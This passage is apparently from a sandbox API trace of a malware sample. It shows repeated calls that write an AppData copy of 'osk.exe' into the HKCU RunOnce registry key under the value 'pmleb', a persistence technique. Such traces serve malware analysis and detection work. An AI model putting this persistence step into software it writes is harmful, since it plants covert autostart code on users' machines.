cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.712] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.712] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, 
lpdwDisposition=0x0) returned 0x0 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.712] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.712] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.712] RegCloseKey (hKey=0x280) returned 0x0 [0077.712] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.712] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.712] SetTimer (hWnd=0x20280, nIDEvent=0x2012, uElapse=0xa, lpTimerFunc=0x0) returned 0x2012 [0077.712] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.725] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.725] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.725] KillTimer (hWnd=0x20280, uIDEvent=0x2012) returned 1 [0077.725] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.725] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.725] IUnknown:Release (This=0x787518) returned 0x1 [0077.725] 
FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.725] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.725] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.726] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, 
[7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.726] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.726] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0077.726] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.726] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x14 [0077.726] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.727] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0077.727] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.727] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.727] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.727] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.727] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.727] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.727] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.727] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.727] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.727] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.728] RegCloseKey (hKey=0x280) returned 0x0 [0077.728] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.728] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.728] SetTimer (hWnd=0x20280, nIDEvent=0x2013, uElapse=0xa, lpTimerFunc=0x0) returned 0x2013 [0077.728] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.741] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.741] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.741] KillTimer (hWnd=0x20280, uIDEvent=0x2013) returned 1 [0077.741] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.741] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.741] IUnknown:Release (This=0x787518) returned 0x1 [0077.741] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, 
[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.741] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.741] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.742] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.742] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.742] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0077.742] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.742] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x15 [0077.742] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.743] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0077.743] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.743] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.743] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.743] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.743] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.743] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.743] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.743] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0077.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.744] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.744] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.744] RegCloseKey (hKey=0x280) returned 0x0 [0077.744] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.744] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.744] SetTimer (hWnd=0x20280, nIDEvent=0x2014, uElapse=0xa, lpTimerFunc=0x0) returned 0x2014 [0077.744] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.756] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.756] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.756] KillTimer (hWnd=0x20280, uIDEvent=0x2014) returned 1 [0077.756] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.756] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.756] IUnknown:Release (This=0x787518) returned 0x1 [0077.757] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0077.757] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.757] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.757] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.757] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.757] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0077.757] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.757] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x16 [0077.757] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
